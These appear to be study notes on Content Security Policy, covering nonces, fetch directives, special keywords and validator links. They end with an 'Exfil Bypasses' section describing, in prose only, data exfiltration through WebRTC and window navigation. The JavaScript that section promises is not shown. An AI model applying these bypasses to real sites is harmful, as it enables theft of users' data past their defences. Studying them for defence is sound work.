Content Security Policy (CSP)
CSP is a strong mitigation against cross-site scripting (XSS): the server declares which sources of scripts, styles and other content the browser may load or execute, so markup injected into the page cannot run attacker-controlled script on its own. It is defence in depth, not a replacement for output encoding.
https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP
https://cspvalidator.org/#url=https://cspvalidator.org/
https://csp-evaluator.withgoogle.com/
Nonce
A per-response random value: the server puts 'nonce-<value>' in the policy and the same value in the nonce attribute of the tags it emits. This lets you remove 'unsafe-inline' from the CSP value.
Only script tags carrying the matching nonce attribute will execute.
Only style tags carrying the matching nonce attribute will apply.
Nonce for external scripts: a nonce attribute on <script src="..."> authorises that external script as well, even if its host is not listed in script-src.
Generate a fresh, unpredictable nonce for every response; a reused or guessable nonce defeats the purpose, since an attacker who can predict it can add it to injected tags.
Keys
script-src: sources allowed for <script> (inline via nonce or hash, external via host or scheme)
style-src: sources allowed for stylesheets and inline styles
default-src: fallback for every fetch directive that is not set explicitly (a directive that is set does not merge with it, it replaces it)
img-src: sources allowed for images
child-src: nested browsing contexts (frames) and workers; frame-src and worker-src take precedence when present
foobar-src: placeholder for any other fetch directive (connect-src, font-src, media-src, object-src, frame-src, worker-src, ...)
report-uri: endpoint that receives violation reports; deprecated in favour of report-to but still widely supported, so deployments often send both
script-src
https://developer.mozilla.org/en-US/docs/Web/HTML/Global_attributes/nonce
Nonce Value: only script tags carrying the nonce value will run. The keyword must be wrapped in straight ASCII single quotes; curly quotes are not parsed and silently break the policy.
Content-Security-Policy: script-src 'nonce-8IBTHwOdqNKAWeKl7plt8g=='
Special Values
'unsafe-inline': allows the execution of inline scripts, inline event handlers and javascript: URLs. Browsers ignore it when the same directive also contains a nonce or hash source, which is what keeps a nonce-based policy compatible with old CSP1-only clients.
'unsafe-eval': allows eval(), new Function() and string arguments to setTimeout/setInterval.
'self': the page's own origin (scheme, host and port); it does not cover inline scripts.
'none': matches nothing; typical for object-src and base-uri.
'strict-dynamic': trust propagates from a nonced or hashed script to the scripts it loads, and host allow-lists in the same directive are ignored.
Exfil Bypasses
https://web.archive.org/web/20240519115002/https://btidor.dev/content-security-policy
WebRTC Bypass: RTCPeerConnection ICE candidate gathering and data channels talk to attacker-chosen server addresses, and that traffic is not governed by connect-src, so a policy that locks down fetch directives does not stop it. CSP3 defines a separate webrtc directive ('allow' or 'block') for this; check current browser support before relying on it.
Window Bypass
If there is data you want to extract from a page, you can still just use the JS below: navigating the window (assigning location or calling window.open) to an attacker URL that carries the data is a navigation, not a fetch, so connect-src does not apply to it.